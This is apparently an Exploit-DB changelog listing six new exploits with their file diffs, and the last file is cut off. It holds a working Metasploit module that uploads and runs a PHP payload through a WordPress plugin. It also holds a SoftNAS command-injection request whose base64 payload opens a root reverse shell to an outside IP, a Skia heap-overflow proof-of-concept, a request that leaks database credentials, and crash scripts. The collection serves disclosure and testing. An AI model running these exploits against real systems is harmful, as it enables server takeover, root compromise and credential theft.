DB: 2018-07-28

6 changes to exploits/shellcodes

QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)
NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)
Skia - Heap Overflow in SkScan::FillPath due to Precision Error

WordPress Plugin Responsive Thumbnail Slider - Arbitrary File Upload (Metasploit)

Wordpress Background Takeover < 4.1.4 - Directory Traversal
WordPress Plugin Background Takeover < 4.1.4 - Directory Traversal

Wordpress < 4.9.6 - (Authenticated) Arbitrary File Deletion
WordPress Core < 4.9.6 - (Authenticated) Arbitrary File Deletion
WordPress Form Maker Plugin 1.12.24 - SQL Injection
WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection
WordPress Plugin Form Maker 1.12.24 - SQL Injection
WordPress Plugin Contact Form Maker 1.12.20 - SQL Injection

Trivum Multiroom Setup Tool 8.76 - Corss-Site Request Forgery (Admin Bypass)
Online Trade 1 - Information Disclosure
SoftNAS Cloud < 4.0.3 - OS Command Injection

exploits/linux/webapps/45094.txt

@@ -0,0 +1,67 @@
+# Exploit Title: Online Trade 1 - Information Disclosure
+# Exploit Author: Dhamotharan
+# Date: 2018-07-17
+# Vendor Homepage: https://codecanyon.net/item/online-trade-online-forex-and-cryptocurrency-investment-system/21987193?s_rank=14
+# CVE : CVE-2018-14328
+# Version: 1
+# Tested on: Kali Linux
+
+# Description :
+# Brynamics "Online Trade - Online trading and cryptocurrency investment
+# system" allows remote attackers to obtain sensitive information via a
+# direct request for /dashboard/addplan, /dashboard/paywithcard/charge,
+# /dashboard/withdrawal, or /privacy&terms,
+# as demonstrated by reading database username, database password,
+# database_name, and IP address.
+
+# POC:
+
+# Request:
+
+POST /dashboard/withdrawal HTTP/1.1
+Host: 127.0.0.1:8080
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64;
+Trident/5.0)
+Connection: close
+Referer: http://127.0.0.1:8080/dashboard/withdrawals
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 112
+Cookie:
+XSRF-TOKEN=eyJpdiI6IlAwSjE2SjE1REVUdTM0bXhsMDY1b3c9PSIsInZhbHVlIjoiN204
+d3RFcmdOSFVmTEo2cGh5bFlxY3RlR0p2U2hoN3NkNDZ5Vit3MjdpS3B2RHJG
+aVFZdzlKNmFyN25RbWJLRnZtT3FaTDVvbHV4Ym9HMmFiWlhGY0E9PSIsIm1h
+YyI6ImZmNTFhOGJkMmYxMTBlMGRjZDU4YzQ5MTI3NTljN2JiOGYyODc3MTEx
+YjhjMzFiZTNkNWMzZjc5YjVlYTUyODEifQ%3D%3D;
+laravel_session=eyJpdiI6IjZycklXVDNRTWsrT0NsZ3A2ZnIrWFE9PSIsInZhbHVlIjoiRzdC
+VlJzXC81VWdSWHlkSys2K3dtR2h3UnpzZzhjT1wvdDZtZ3BOMXpjU09SMTJD
+TGdXeEhSWkhadGt0RnhPRDR3MWZreXlLOTA1RDNIQStIZFpxRG5OZz09Iiwi
+bWFjIjoiNTkwYzU3ZGMxOTg3NWU1ZWFjNjVjNjNkN2VjODkzYTBjZDI3MTAx
+NWJmZTUzN2VhZDRlNzEyMDcyODk5ZmFlZiJ9;
+__tawkuuid=e::trade.brynamics.xyz::3PC5vtdJoz40C7aJUDGFFuGkOrICf1
+3gr5+ReA6AWqfUvhPDsTAf982UcNP+u5nq::2;
+TawkConnectionTime=0
+
+amount=555-555-0199@example.com
+&payment_mode=Bitcoin&method_id=2&_token=
+VG4OwJ1Dxx0kDSA3JCp0JtHDMX3TI5WpXE6nTDWi
+
+# Response:
+
+HTTP/1.1 500 Internal Server Error
+Date: Mon, 16 Jul 2018 11:14:58 GMT
+Server: Apache
+X-Powered-By: PHP/7.0.30
+Cache-Control: no-cache, private
+Connection: close
+Content-Type: text/html; charset=UTF-8
+Content-Length: 708733
+<!DOCTYPE html><!--
+Illuminate\Database\QueryException: SQLSTATE[22001]: String data, right
+truncated: 1406 Data too long for column &#039;amount&#039; at row
+1 (SQL:
+insert into `withdrawals` (`amount`, `to_deduct`, `payment_mode`, `status`,
+`user`, `updated_at`, `created_at`) values (555-555-0199@example.com,
+620.5, Bitcoin, Pending, 182, 2018-07-16 11:14:59, 2018-07-16 11:14:59)) in

exploits/multiple/dos/45098.txt

@@ -0,0 +1,163 @@
+There is a heap overflow in Skia when drawing paths with antialiasing turned off. This issue can be triggered in both Google Chrom and Mozilla Firefox by rendering a specially crafted SVG image. PoCs for both browsers are attached.
+
+
+Details:
+
+When Skia fills a path with antialiasing turned off, SkScan::FillPath gets called
+https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=609
+
+SkScan::FillPath first checks that the path fits in the current drawing area (Clip). This happens in
+https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=645
+
+If the clipping test passes at this point, then no other clipping checks will be performed when drawing this path. However, due to precision errors, it is possible that the drawing algorith is going to end up drawing outside of the current drawing area, which results in a heap overflow.
+
+In this case, the precision errors happens when drawing cubic splines. In SkCubicEdge::setCubicWithoutUpdate, various factors needed to draw the spline are calculated. For example, on this line
+https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=430
+when calculating fCDx, some precision will be lost because C and D end up being shifted to the right. Because of that, it is possible that the fCDx value is going to end up smaller than it should be.
+
+The (too small) value of fCDx then gets added to the X coordinate here
+https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=471
+
+it then gets propagated here
+https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=492
+
+and here
+https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkEdge.cpp?g=0&rcl=5eb8fc585e9b3c9ccc82b0921986e1020ddaff23&l=116
+
+where fX ends up being -2**15 (this corresponds to -0.5 in SkFixed type) and fDX ends up negative. When a spline (now approximated as a line segment) gets drawn in walk_convex_edges or walk_edges, fDX gets added to fX
+https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=267
+then the resulting value gets rounded
+https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?rcl=3708f024b1118a73f0e6b3080234311c6647663b&l=249
+and becomes -1, which leads to an out-of-bounds write.
+
+Example Skia program that demonstrates the issue:
+Note: it should be built with ASan enabled.
+=================================================
+
+#include "SkCanvas.h"
+#include "SkPath.h"
+#include "SkBitmap.h"
+#include "SkGradientShader.h"
+
+int main (int argc, char * const argv[]) {
+
+  int width = 100;
+  int height = 100;
+
+  SkBitmap bitmap;
+  bitmap.allocN32Pixels(width, height);
+  SkCanvas bitmapcanvas(bitmap);
+  SkCanvas *canvas = &bitmapcanvas;
+
+  SkPaint p;
+
+  p.setAntiAlias(false);
+
+  p.setStyle(SkPaint::kFill_Style);
+
+  SkColor colors[2] = {SkColorSetARGB(10,0,0,0), SkColorSetARGB(10,255,255,255)};
+  SkPoint points[2] = {
+     SkPoint::Make(0.0f, 0.0f),
+     SkPoint::Make(256.0f, 256.0f)
+  };
+  p.setShader(SkGradientShader::MakeLinear(
+             points, colors, nullptr, 2,
+             SkShader::kClamp_TileMode, 0, nullptr));
+
+  SkPath path;
+  path.moveTo(-30/64.0, -31/64.0);
+  path.cubicTo(-31/64.0, -31/64,-31/64.0, -31/64,-31/64.0, 100);
+  path.lineTo(100,100);
+  path.lineTo(100,-31/64.0);
+
+  canvas->drawPath(path, p);
+
+  return 0; 
+}
+
+=================================================
+
+Running this results in the following UBSan error:
+../../include/core/SkPixmap.h:386:83: runtime error: left shift of negative value -1
+SUMMARY: AddressSanitizer: undefined-behavior ../../include/core/SkPixmap.h:386:83 in 
+
+If the program is compiled without undefined-behavior checks, then running it generates the following ASan report
+
+=================================================================
+==18863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6140000021d0 at pc 0x0000018df91a bp 0x7ffcdc7708d0 sp 0x7ffcdc7708c8
+WRITE of size 4 at 0x6140000021d0 thread T0
+    #0 0x18df919 in (anonymous namespace)::DstTraits<unsigned int, ((anonymous namespace)::ApplyPremul)0>::store((anonymous namespace)::SkNx<4, float> const&, unsigned int*, (anonymous namespace)::SkNx<4, float> const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fGradientPriv.h:73:18
+    #1 0x18df919 in void (anonymous namespace)::ramp<unsigned int, ((anonymous namespace)::ApplyPremul)0>((anonymous namespace)::SkNx<4, float> const&, (anonymous namespace)::SkNx<4, float> const&, unsigned int*, int, (anonymous namespace)::SkNx<4, float> const&, (anonymous namespace)::SkNx<4, float> const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:45
+    #2 0x18d3eb1 in void SkLinearGradient::LinearGradient4fContext::shadeSpanInternal<unsigned int, ((anonymous namespace)::ApplyPremul)0, (SkShader::TileMode)0>(int, int, unsigned int*, int, float, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:256:13
+    #3 0x18d3eb1 in void SkLinearGradient::LinearGradient4fContext::shadePremulSpan<unsigned int, ((anonymous namespace)::ApplyPremul)0>(int, int, unsigned int*, int, float, float) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:209
+    #4 0x18d3eb1 in SkLinearGradient::LinearGradient4fContext::shadeSpan(int, int, unsigned int*, int) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fLinearGradient.cpp:181
+    #5 0x167213d in SkARGB32_Shader_Blitter::blitH(int, int, int) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBlitter_ARGB32.cpp:377:25
+    #6 0xd1cf47 in walk_convex_edges(SkEdge*, SkPath::FillType, SkBlitter*, int, int, void (*)(SkBlitter*, int, bool)) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_Path.cpp:261:30
+    #7 0xd1b364 in sk_fill_path(SkPath const&, SkIRect const&, SkBlitter*, int, int, int, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_Path.cpp:471:9
+    #8 0xd1e625 in SkScan::FillPath(SkPath const&, SkRegion const&, SkBlitter*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_Path.cpp:656:9
+    #9 0xd0c39a in SkScan::FillPath(SkPath const&, SkRasterClip const&, SkBlitter*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkScan_AntiPath.cpp:827:9
+    #10 0xb9ae3d in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1024:9
+    #11 0xb9c046 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1141:11
+    #12 0x164e60a in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:15
+    #13 0x164e60a in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:411
+    #14 0xb44c54 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2145:23
+    #15 0xb3bf59 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1708:11
+    #16 0x86021e in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:37:11
+    #17 0x7fd0eb3672b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+    #18 0x770659 in _start (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x770659)
+
+0x6140000021d0 is located 0 bytes to the right of 400-byte region [0x614000002040,0x6140000021d0)
+allocated by thread T0 here:
+    #0 0x825b20 in __interceptor_malloc (/usr/local/google/home/ifratric/p0/skia/skia/out/asan/SkiaSDLExample+0x825b20)
+    #1 0xdf1d74 in sk_malloc_flags(unsigned long, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/ports/SkMemory_malloc.cpp:69:13
+    #2 0x1671202 in sk_malloc_throw(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../include/private/SkMalloc.h:59:12
+    #3 0x1671202 in SkARGB32_Shader_Blitter::SkARGB32_Shader_Blitter(SkPixmap const&, SkPaint const&, SkShaderBase::Context*) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBlitter_ARGB32.cpp:336
+    #4 0x16643f9 in SkARGB32_Shader_Blitter* SkArenaAlloc::make<SkARGB32_Shader_Blitter, SkPixmap const&, SkPaint const&, SkShaderBase::Context*&>(SkPixmap const&, SkPaint const&, SkShaderBase::Context*&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkArenaAlloc.h:103:30
+    #5 0x1663681 in SkBlitter::Choose(SkPixmap const&, SkMatrix const&, SkPaint const&, SkArenaAlloc*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBlitter.cpp:1119:34
+    #6 0xb9b4fe in SkAutoBlitterChoose::choose(SkDraw const&, SkMatrix const*, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkAutoBlitterChoose.h:36:20
+    #7 0xb9aa59 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:966:34
+    #8 0xb9c046 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*, SkInitOnceData*) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.cpp:1141:11
+    #9 0x164e60a in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkDraw.h:58:15
+    #10 0x164e60a in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkBitmapDevice.cpp:411
+    #11 0xb44c54 in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:2145:23
+    #12 0xb3bf59 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/core/SkCanvas.cpp:1708:11
+    #13 0x86021e in main /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../example/SkiaSDLExample.cpp:37:11
+    #14 0x7fd0eb3672b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/local/google/home/ifratric/p0/skia/skia/out/asan/../../src/shaders/gradients/Sk4fGradientPriv.h:73:18 in (anonymous namespace)::DstTraits<unsigned int, ((anonymous namespace)::ApplyPremul)0>::store((anonymous namespace)::SkNx<4, float> const&, unsigned int*, (anonymous namespace)::SkNx<4, float> const&)
+Shadow bytes around the buggy address:
+  0x0c287fff83e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c287fff83f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x0c287fff8400: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x0c287fff8410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c287fff8420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+=>0x0c287fff8430: 00 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa
+  0x0c287fff8440: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
+  0x0c287fff8450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c287fff8460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c287fff8470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c287fff8480: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==18863==ABORTING
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/45098.zip

exploits/php/remote/45099.rb

@@ -0,0 +1,159 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::PhpEXE
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
+      'Description'    => %q{
+        This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider
+        Plugin v1.0 for WordPress post authentication.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Arash Khazaei', # EDB PoC
+          'Shelby Pace'    # Metasploit Module
+        ],
+      'References'     =>
+        [
+          [ 'EDB', '37998' ]
+        ],
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'Responsive Thumbnail Slider Plugin v1.0', { } ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Aug 28 2015",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [ true, "Base path for WordPress", '/' ]),
+        OptString.new('WPUSERNAME', [ true, "WordPress Username to authenticate with", 'admin' ]),
+        OptString.new('WPPASSWORD', [ true, "WordPress Password to authenticate with", '' ])
+      ])
+  end
+
+  def check
+    # The version regex found in extract_and_check_version does not work for this plugin's
+    # readme.txt, so we build a custom one.
+    check_code = check_version || check_plugin_path
+    if check_code
+      return check_code
+    else
+      return CheckCode::Safe
+    end
+  end
+
+  def check_version
+    plugin_uri = normalize_uri(target_uri.path, '/wp-content/plugins/wp-responsive-thumbnail-slider/readme.txt')
+
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  plugin_uri
+    )
+
+    if res && res.body && res.body =~ /Version:([\d\.]+)/
+      version = Gem::Version.new($1)
+      if version <= Gem::Version.new('1.0')
+        vprint_status("Plugin version found: #{version}")
+        return CheckCode::Appears
+      end
+    end
+
+    nil
+  end
+
+  def check_plugin_path
+    plugin_uri = normalize_uri(target_uri.path, '/wp-content/uploads/wp-responsive-images-thumbnail-slider/')
+
+    res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  plugin_uri
+    )
+
+    if res && res.code == 200
+      vprint_status('Upload folder for wp-responsive-images-thumbnail-slider detected')
+      return CheckCode::Detected
+    end
+
+    nil
+  end
+
+  def login
+    auth_cookies = wordpress_login(datastore['WPUSERNAME'], datastore['WPPASSWORD'])
+    return fail_with(Failure::NoAccess, "Unable to log into WordPress") unless auth_cookies
+
+    store_valid_credential(user: datastore['WPUSERNAME'], private: datastore['WPPASSWORD'], proof: auth_cookies)
+
+    print_good("Logged into WordPress with #{datastore['WPUSERNAME']}:#{datastore['WPPASSWORD']}")
+    auth_cookies
+  end
+
+  def upload_payload(cookies)
+    manage_uri = 'wp-admin/admin.php?page=responsive_thumbnail_slider_image_management'
+    file_payload = get_write_exec_payload(:unlink_self => true)
+    file_name = "#{rand_text_alpha(5)}.php"
+
+    # attempt to access plugins page
+    plugin_res = send_request_cgi(
+      'method'  =>  'GET',
+      'uri'     =>  normalize_uri(target_uri.path, manage_uri),
+      'cookie'  =>  cookies
+    )
+
+    unless plugin_res && plugin_res.body.include?("tmpl-uploader-window")
+      fail_with(Failure::NoAccess, "Unable to reach Responsive Thumbnail Slider Plugin Page")
+    end
+
+    data = Rex::MIME::Message.new
+    data.add_part(file_payload, 'image/jpeg', nil, "form-data; name=\"image_name\"; filename=\"#{file_name}\"")
+    data.add_part(file_name.split('.')[0], nil, nil, "form-data; name=\"imagetitle\"")
+    data.add_part('Save Changes', nil, nil, "form-data; name=\"btnsave\"")
+    post_data = data.to_s
+
+    # upload the file
+    upload_res = send_request_cgi(
+      'method'  =>  'POST',
+      'uri'     =>  normalize_uri(target_uri.path, manage_uri, '&action=addedit'),
+      'cookie'  =>  cookies,
+      'ctype'   =>  "multipart/form-data; boundary=#{data.bound}",
+      'data'    =>  post_data
+    )
+
+    page = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path, manage_uri), 'cookie' => cookies)
+    fail_with(Failure::Unknown, "Unsure of successful upload") unless (upload_res && page && page.body =~ /New\s+image\s+added\s+successfully/)
+
+    retrieve_file(page, cookies)
+  end
+
+  def retrieve_file(res, cookies)
+    fname = res.body.scan(/slider\/(.*\.php)/).flatten[0]
+    fail_with(Failure::BadConfig, "Couldn't find file name") if fname.empty? || fname.nil?
+    file_uri = normalize_uri(target_uri.path, "wp-content/uploads/wp-responsive-images-thumbnail-slider/#{fname}")
+
+    print_good("Successful upload")
+    send_request_cgi(
+      'uri' => file_uri,
+      'method' => 'GET',
+      'cookie' => cookies
+    )
+  end
+
+  def exploit
+   unless check == CheckCode::Safe
+     auth_cookies = login
+     upload_payload(auth_cookies)
+   end
+  end
+end

exploits/php/webapps/45097.txt

@@ -0,0 +1,168 @@
+Core Security - Corelabs Advisory
+http://corelabs.coresecurity.com/
+
+SoftNAS Cloud OS Command Injection
+
+1. *Advisory Information*
+
+Title: SoftNAS Cloud OS Command Injection
+Advisory ID: CORE-2018-0009
+Advisory URL:
+http://www.coresecurity.com/advisories/softnas-cloud-OS-command-injection
+Date published: 2018-07-26
+Date of last update: 2018-05-28
+Vendors contacted: SoftNAS
+Release mode: Coordinated release
+
+2. *Vulnerability Information*
+
+Class:  Improper Neutralization of Special Elements used in an OS
+Command [CWE-78]
+Impact: Code execution
+Remotely Exploitable: Yes
+Locally Exploitable: Yes
+CVE Name: CVE-2018-14417
+
+3. *Vulnerability Description*
+
+SoftNAS' website states that:
+
+[1] SoftNAS Cloud is a software-defined NAS filer delivered as a virtual
+storage appliance that runs within public, private or hybrid clouds.
+SoftNAS Cloud provides enterprise-grade NAS capabilities, including
+encryption, snapshots, rapid rollbacks, and cross-zone high-availability
+with automatic failover.
+
+A command injection vulnerability was found in the web administration
+console. In particular, snserv script did not sanitize some input
+parameters before executing a system command.
+
+4. *Vulnerable Packages*
+
+. SoftNAS Cloud versions prior to 4.0.3
+Other products and versions might be affected, but they were not tested.
+
+
+5. *Vendor Information, Solutions and Workarounds*
+
+SoftNAS released SoftNAS Cloud 4.0.3 that addresses the reported
+vulnerability. The software update can be performed via the
+StorageCenter admin UI in the product.
+For more information on the updating process see:
+https://www.softnas.com/docs/softnas/v3/html/updating_to_the_latest_version.html.
+
+In addition, SoftNAS published the following release note:
+https://docs.softnas.com/display/SD/Release+Notes
+
+6. *Credits*
+
+The vulnerability was discovered and researched by Fernando Diaz and
+Fernando Catoira from Core Security Consulting Services. The publication
+of this advisory was coordinated by Leandro Cuozzo from Core Advisories
+Team.
+
+7. *Technical Description / Proof of Concept Code*
+
+7.1. *Check and execute update functionality abuse leading to command
+execution*
+[CVE-2018-14417]
+The 'recentVersion' parameter from the snserv endpoint is vulnerable to
+OS Command Injection when check and execute update operations are
+performed.
+This endpoint has no authentication/session verification. Therefore, it
+is possible for an unauthenticated attacker to execute malicious code in
+the target server. As the WebServer runs a Sudoer user (apache), the
+malicious code can be executed with root permissions.
+
+The following part of the /etc/sudoers file shows the apache user
+capabilities.
+
+/-----
+User_Alias      APACHE = apache
+# Once SoftNAS UI is operational, only allow the specific command that
+require sudo access!!
+Cmnd_Alias      SOFTNAS = ALL
+APACHE  ALL = (ALL) NOPASSWD: SOFTNAS
+-----/
+
+The following proof of concept generates a remote shell on the target
+system as root:
+
+/-----
+GET
+/softnas/snserver/snserv.php?opcode=checkupdate&opcode=executeupdate&selectedupdate=3.6aaaaaaa.1aaaaaaaaaaaaaa&update_type=standard&recentVersions=3.6aaaaaaaaaaa.1aaaaaaa;echo+YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4yLjQ1LjE4NS8xMjM0NSAwPiYx+|+base64+-d+|+sudo+bash;
+HTTP/1.1
+Host: 10.2.45.208
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)
+Gecko/20100101 Firefox/59.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://10.2.45.208/softnas/applets/update/
+X-Requested-With: XMLHttpRequest
+Connection: close
+-----/
+
+As can be seen in the former request the payload had to be base64
+encoded as some special characters were not being properly decoded.
+
+8. *Report Timeline*
+2018-05-29: Core Security sent an initial notification to SoftNAS,
+including a draft advisory.
+2018-05-31: SoftNAS confirmed the reported vulnerability and informed
+they were working on a plan to fix the issue.
+2018-05-31: Core Security thanked the SoftNAS' reply.
+2018-06-15: Core Security requested a status update.
+2018-06-26: SoftNAS answered saying the fixed version was scheduled for
+late July.
+2018-06-26: Core Security thanked the update.
+2018-07-16: Core Security asked for a status update and requested a
+solidified release date.
+2018-07-16: SoftNAS informed that the new release version were under QA
+verification and they would have the release date during the week.
+2018-07-19: SoftNAS notified Core Security that SoftNAS Cloud 4.0.3
+version was already available.
+2018-07-19: Core Security thanked SoftNAS's update and set July 26th as
+the publication date.
+2018-07-26: Advisory CORE-2018-0009 published.
+
+9. *References*
+
+[1] https://www.softnas.com
+
+10. *About CoreLabs*
+
+CoreLabs, the research center of Core Security, is charged with
+anticipating the future needs and requirements for information security
+technologies. We conduct our research in several important areas of
+computer security including system vulnerabilities, cyber attack
+planning and simulation, source code auditing, and cryptography. Our
+results include problem formalization, identification of
+vulnerabilities, novel solutions and prototypes for new technologies.
+CoreLabs regularly publishes security advisories, technical papers,
+project information and shared software tools for public use at:
+http://corelabs.coresecurity.com.
+
+11. *About Core Security*
+
+Core Security provides companies with the security insight they need to
+know who, how, and what is vulnerable in their organization. The
+company's threat-aware, identity & access, network security, and
+vulnerability management solutions provide actionable insight and
+context needed to manage security risks across the enterprise. This
+shared insight gives customers a comprehensive view of their security
+posture to make better security remediation decisions. Better insight
+allows organizations to prioritize their efforts to protect critical
+assets, take action sooner to mitigate access risk, and react faster if
+a breach does occur.
+
+Core Security is headquartered in the USA with offices and operations in
+South America, Europe, Middle East and Asia. To learn more, contact Core
+Security at (678) 304-4500 or info@coresecurity.com
+
+12. *Disclaimer*
+
+The contents of this advisory are copyright (c) 2018 Core Security and
+(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution
+Non-Commercial Share-Alike 3.0 (United States) License:
+http://creativecommons.org/licenses/by-nc-sa/3.0/us/

exploits/windows/dos/45092.py

@@ -0,0 +1,25 @@
+# Exploit Title: QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)
+# Discovery by: Luis Martínez
+# Discovery Date: 2018-07-26
+# Vendor Homepage: https://www.qnapsecurity.com/n/en/
+# Software Link : http://download.qnap.com/Surveillance/QVRClient/Qmon_5.1.1.30070.zip
+# Tested Version: 5.1.1.30070
+# Vulnerability Type:   Denial of Service (DoS) Local
+# Tested on OS:         Windows 10 Pro x64 es
+
+# Steps to Produce the Crash: 
+# 1.- Run python code : python QNap_QVR_Client_5.1.1.30070.py
+# 2.- Open QNap_QVR_Client_5.1.1.30070.txt and copy content to clipboard
+# 3.- Open QVR.exe
+# 4.- Direccion IP/Puerto -> 10.10.10.1 / 80
+# 5.- Username -> admin
+# 6.- Paste ClipBoard on Password
+# 7.- OK
+# 8.- Crashed
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 279
+f = open ("QNap_QVR_Client_5.1.1.30070.txt", "w")
+f.write(buffer)
+f.close()

exploits/windows/dos/45095.py

@@ -0,0 +1,25 @@
+# Exploit Title: NetScanTools Basic Edition 2.5 - 'Hostname' Denial of Service (PoC)
+# Discovery by: Luis Martínez
+# Discovery Date: 2018-07-26
+# Vendor Homepage: https://www.netscantools.com/
+# Software Link : http://download.netscantools.com/nstb250.zip
+# Tested Version: 2.5
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 Pro x64 es
+
+# Steps to Produce the Crash: 
+# 1.- Run python code : python NetScanTools_Basic_Edition_2.5.py
